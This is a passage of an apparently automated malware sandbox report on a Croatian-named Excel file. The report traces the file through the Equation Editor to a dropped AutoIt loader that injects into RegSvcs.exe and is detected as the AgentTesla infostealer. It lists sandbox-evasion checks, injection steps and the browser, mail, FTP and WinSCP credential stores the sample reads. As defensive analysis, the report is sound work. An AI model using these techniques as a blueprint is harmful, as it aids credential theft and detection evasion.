                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.png
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: ghxtg8op.exe, 00000005.00000003.485569970.0000000002980000.00000004.00001000.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.485229228.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D44B37 LoadLibraryA,GetProcAddress,5_2_00D44B37
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D68945 push ecx; ret 5_2_00D68958
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00D448D7
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DC5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00DC5376
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D63187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00D63187
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeAPI/Special instruction interceptor: Address: 994D2C
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: ghxtg8op.exe, 00000005.00000002.486376927.0000000000996000.00000004.00000020.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.483312295.000000000099D000.00000004.00000020.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.483235437.000000000098B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEG
                  Source: ghxtg8op.exe, 00000005.00000002.486156128.0000000000924000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERG
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-105610
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeAPI coverage: 4.6 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3628Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00DA445A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC6D1 FindFirstFileW,FindClose,5_2_00DAC6D1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00DAC75C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAEF95
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAF0F2
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DAF3F3
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA37EF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA3B12
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DABCBC
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00D449A0
                  Source: EQNEDT32.EXEBinary or memory string: a7xK0IOPuRkEw7cBi541oAvQ2V3mw13Nb4AabQLZJTi1TiBJoNLiEQZ8vmUn0hYNBZwNqokcJ4K9IguEkRZlpPJo9HSRMgKlr24MnMtjOaMESw473fYpd1QdFQkO4ufh9sLAS0327SbxxMv8ET3ZfACijc8I8GrKbUXUsdVh15pyrsmPqGsdzkuGAHOpceCnkIQx58XtbsovBNu8PQmfbfpO2nJcX0wI7gmE7SRlQEMUwmaRSOYMXqGGvagLuBNxE5Pz
                  Source: EQNEDT32.EXEBinary or memory string: jSJXcXxC8jYB95SixbHM1iHX42BWQP0TaALv2boMNpjAZg5gb4hgFSmxBdVDJk3HJVmNVlfquI22akWPDuExrICpBs9Cc3NU4y0fg3OvtgsZrJiBvfGyWHSQCIWF0OtO19RaDUusUVeY1PXHurCVrRS4OP278mVGKWUvm770pIkml5uzJ2SKYm60wl5cdF7N8dYS1xvZ6ab0iMjaIjRFFNJWys6WBpd2a22wa2FsRvc1XGuM1SY1cDyueISbRYxUrENC
                  Source: EQNEDT32.EXEBinary or memory string: vtSnJ7pmP4ZylMwRqsJv0xg8ancIV2BuqhRksIr6DFGMLVqhDSYAI2bti9LfkJKbVVdIsLSwkUxxTEFiWRrWUeBwGUPGVJWKJ6hTEanpPbIp4qI1Bbq1U4ZmdZS9fKxcgHHJrG2GcMyz1a9AckChDawyGCAM9dm01o4qfgJpkXcUGlygDcZaZTQ1W8AtrV81jUg5Y7o0FvuKgeu4N1ciS1CTqA8oiECBD4o6PqeMUITZBW8tXjy7mVQrc4i7b462sM5t
                  Source: EQNEDT32.EXEBinary or memory string: yO3gjjQlAeIQaRwgS6OFFX3kesUC7DasRPmFmHgFsxwoSaEgx9fIUcMD1NCWrrzcKPlHiRKqVq7ooYIY5Z2K4x7azKmR2TmV2CgnQWV6Q4WQXcJpE99LsqUMxWu0YJ44yXAqonMX2PmhY4R2ogfPpYd4LjEFJg3pYDsRnW4gmfZemBpjFxFXpNhHXjOBDrsKB0UcI0n42cWK5FcQujXlmaqUxK3qA7h5FidPBWfEE3KkQWzdFnD8bTEE1HtH5kfeB6zq
                  Source: EQNEDT32.EXEBinary or memory string: cG75oCxrsAvcosQVK5ksLqLmqzCWxybZHn3lRLSazrfvOk4rOWcsd9yFOX3clGcwudJefxpyN0LdypJhGlGkagAGXWnGA1QBBnp3eYSohbt2jfXmcrckNyLbwzLkJoR5lKVEWflrbhBQnmAv4qaA8Zt4GybLL83PHGFSTq9vkJ83LictKi4H3yEP9UULSYfxPcw2ec2lnVfEXzHS0YyOGjkRGbt1lZiUnQWFCUoANHfEW8YPmMDlwMsvFIjfRkan7jtL
                  Source: EQNEDT32.EXEBinary or memory string: 1hPBckyaFYmpvZk5thVZJzErKamQIx5ULJp85KHYh5Uj7Jc9bme0U3EOEOo0Z33tBaVZMiPJ38tm7qNnrTBUl7QXYAAoRcoCbRjdzJ8VMcI7TYpfghPBdbdvLpAzQ583bllVVXFmdQxvisiQ7MaFevbFcG4h3rn6ETtJPnXovSALNCrhBL0qLS89QN96sLb2VTQDGTlFFdCWzw0BvZw7Ee1Hm6hMOvJUSebOa0jjdrKd4UxWNxgDrs0JiJ0bA2h69xjz
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeAPI call chain: ExitProcess graph end nodegraph_5-104947
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeAPI call chain: ExitProcess graph end nodegraph_5-104519
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DB3F09 BlockInput,5_2_00DB3F09
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D43B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00D43B3A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D75A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00D75A7C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D44B37 LoadLibraryA,GetProcAddress,5_2_00D44B37
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560567 mov edx, dword ptr fs:[00000030h]2_2_03560567
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00993978 mov eax, dword ptr fs:[00000030h]5_2_00993978
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00994F98 mov eax, dword ptr fs:[00000030h]5_2_00994F98
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00994FF8 mov eax, dword ptr fs:[00000030h]5_2_00994FF8
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,5_2_00D980A9
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00D6A155
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6A124 SetUnhandledExceptionFilter,5_2_00D6A124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D987B1 LogonUserW,5_2_00D987B1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D43B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00D43B3A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00D448D7
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA4C53 mouse_event,5_2_00DA4C53
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D97CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00D97CAF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D9874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00D9874B
                  Source: ghxtg8op.exe, 00000005.00000000.482962513.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp, ghxtg8op.exe.2.dr, ngown[1].exe.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: ghxtg8op.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6862B cpuid 5_2_00D6862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D74E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00D74E87
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D81E06 GetUserNameW,5_2_00D81E06
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D73F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00D73F3A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00D449A0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ghxtg8op.exe PID: 3752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3788, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
